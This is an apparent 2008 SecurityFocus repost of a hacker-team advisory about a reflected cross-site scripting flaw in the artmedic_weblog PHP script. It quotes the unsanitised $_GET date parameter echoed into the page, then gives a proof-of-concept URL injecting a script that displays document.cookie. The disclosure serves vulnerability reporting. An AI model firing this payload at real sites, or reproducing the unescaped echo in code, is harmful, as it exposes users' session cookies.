artmedic_weblog Cross Site Scriptting Vulnerbility Feb 15 2008 12:17AM
hadihadi_zedehal_2006 yahoo com


########################################################################

# #

# .:::::artmedic_weblog Cross Site Scriptting Vulnerbility ::::. #

########################################################################

Virangar Security Team

www.virangar.org

www.virangar.net

--------

Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

--------------

download http://artmedic-phpscripts.de/index.php?did=artmedic_weblog.zip

-----

vuln code in artmedic_print.php:

line 42: $date = $_GET[date];

.

.

.

line 49: echo "<h1>$date</h1>";

----

xss:

http://site.com/[patch]/artmedic_print.php?date=<script>alert(document.c
ookie)</script>

-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus